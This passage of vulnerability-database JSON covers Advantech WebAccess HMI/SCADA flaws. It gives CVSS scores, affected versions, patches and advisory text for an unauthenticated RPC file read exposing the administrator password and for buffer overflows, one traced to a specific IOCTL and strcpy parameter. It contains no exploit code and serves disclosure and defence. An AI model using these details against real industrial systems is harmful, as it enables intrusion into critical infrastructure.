"CNNVD", "id": "CNNVD-202004-020", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-155377", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "VULHUB", "id": "VHN-155377" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNNVD", "id": "CNNVD-202004-020" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.4 does not properly restrict an RPC call that allows unauthenticated, remote users to read files. An attacker can use this vulnerability to recover the administrator password. Advantech WebAccess Exists in an inadequate protection of credentials.Information may be obtained. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture of Chinese company Advantech (Advantech). The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automated equipment. \n\r\n\r\nThe Advantech WebAccess 8.3.4 version has an access control error vulnerability that originated from the program\u0027s failure to properly restrict RPC calls", "sources": [ { "db": "NVD", "id": "CVE-2019-3942" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "VULHUB", "id": "VHN-155377" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3942", "trust": 3.7 }, { "db": "TENABLE", "id": "TRA-2019-15", "trust": 2.5 }, { "db": "CNNVD", "id": "CNNVD-202004-020", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2020-22292", "trust": 1.2 }, { "db": "JVNDB", "id": "JVNDB-2019-015244", "trust": 0.8 }, { "db": "IVD", "id": "66FEF8D1-F250-4901-9E4C-AC55484F56D3", "trust": 0.2 }, { "db": "IVD", "id": "39B72FC8-F6A4-4080-90FD-093C362FE043", "trust": 0.2 }, { "db": "IVD", "id": "EFD64E2F-8A74-497E-9B91-FAF9825974A3", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155377", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "VULHUB", "id": "VHN-155377" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNNVD", "id": "CNNVD-202004-020" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "id": "VAR-202004-0688", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "VULHUB", "id": "VHN-155377" } ], "trust": 1.73470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" } ] }, "last_update_date": "2024-11-23T22:12:06.855000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess access control error vulnerability (CNVD-2020-22292)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/213425" }, { "title": "Advantech WebAccess Fixes for access control error vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113162" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNNVD", "id": "CNNVD-202004-020" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-522", "trust": 1.9 }, { "problemtype": "CWE-284", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155377" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3942" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3942" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "VULHUB", "id": "VHN-155377" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNNVD", "id": "CNNVD-202004-020" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNVD", "id": "CNVD-2020-22292" }, { "db": "VULHUB", "id": "VHN-155377" }, { "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "db": "CNNVD", "id": "CNNVD-202004-020" }, { "db": "NVD", "id": "CVE-2019-3942" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-04-01T00:00:00", "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "date": "2020-04-01T00:00:00", "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "date": "2020-04-01T00:00:00", "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "date": "2020-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2020-22292" }, { "date": "2020-04-01T00:00:00", "db": "VULHUB", "id": "VHN-155377" }, { "date": "2020-04-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "date": "2020-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-202004-020" }, { "date": "2020-04-01T17:15:14.830000", "db": "NVD", "id": "CVE-2019-3942" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2020-22292" }, { "date": "2020-04-02T00:00:00", "db": "VULHUB", "id": "VHN-155377" }, { "date": "2020-04-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-015244" }, { "date": "2020-04-09T00:00:00", "db": "CNNVD", "id": "CNNVD-202004-020" }, { "date": "2024-11-21T04:42:54.787000", "db": "NVD", "id": "CVE-2019-3942" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202004-020" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerability regarding inadequate protection of credentials in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-015244" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Access control error", "sources": [ { "db": "IVD", "id": "66fef8d1-f250-4901-9e4c-ac55484f56d3" }, { "db": "IVD", "id": "39b72fc8-f6a4-4080-90fd-093c362fe043" }, { "db": "IVD", "id": "efd64e2f-8a74-497e-9b91-faf9825974a3" }, { "db": "CNNVD", "id": "CNNVD-202004-020" } ], "trust": 1.2 } }
var-201708-1122
Vulnerability from variot
An Improper Restriction Of Operations Within The Bounds Of A Memory Buffer issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities that allow invalid locations to be referenced for the memory buffer, which may allow an attacker to execute arbitrary code or cause the system to crash. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1122", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007574" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12708", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2017-12708", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23885", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "0cff38c7-68ab-44c3-a179-a49a32642390", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-103257", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-12708", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12708", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-12708", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2017-23885", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1278", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-103257", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2017-12708", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "VULHUB", "id": "VHN-103257" }, { "db": "VULMON", "id": "CVE-2017-12708" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Improper Restriction Of Operations Within The Bounds Of A Memory Buffer issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities that allow invalid locations to be referenced for the memory buffer, which may allow an attacker to execute arbitrary code or cause the system to crash. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12708" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "VULHUB", "id": "VHN-103257" }, { "db": "VULMON", "id": "CVE-2017-12708" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12708", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.5 }, { "db": "BID", "id": "100526", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201708-1278", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23885", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007574", "trust": 0.8 }, { "db": "IVD", "id": "0CFF38C7-68AB-44C3-A179-A49A32642390", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103257", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-12708", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "VULHUB", "id": "VHN-103257" }, { "db": "VULMON", "id": "CVE-2017-12708" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "id": "VAR-201708-1122", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "VULHUB", "id": "VHN-103257" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" } ] }, "last_update_date": "2024-11-23T21:53:49.565000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2017-23885)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101169" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74367" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103257" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12708" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12708" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "VULHUB", "id": "VHN-103257" }, { "db": "VULMON", "id": "CVE-2017-12708" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNVD", "id": "CNVD-2017-23885" }, { "db": "VULHUB", "id": "VHN-103257" }, { "db": "VULMON", "id": "CVE-2017-12708" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "db": "NVD", "id": "CVE-2017-12708" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23885" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103257" }, { "date": "2017-08-30T00:00:00", "db": "VULMON", "id": "CVE-2017-12708" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "date": "2017-08-30T18:29:00.530000", "db": "NVD", "id": "CVE-2017-12708" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-23885" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103257" }, { "date": "2019-10-09T00:00:00", "db": "VULMON", "id": "CVE-2017-12708" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007574" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1278" }, { "date": "2024-11-21T03:10:04.223000", "db": "NVD", "id": "CVE-2017-12708" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1278" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007574" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "0cff38c7-68ab-44c3-a179-a49a32642390" }, { "db": "CNNVD", "id": "CNNVD-201708-1278" } ], "trust": 0.8 } }
var-201602-0477
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C76 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
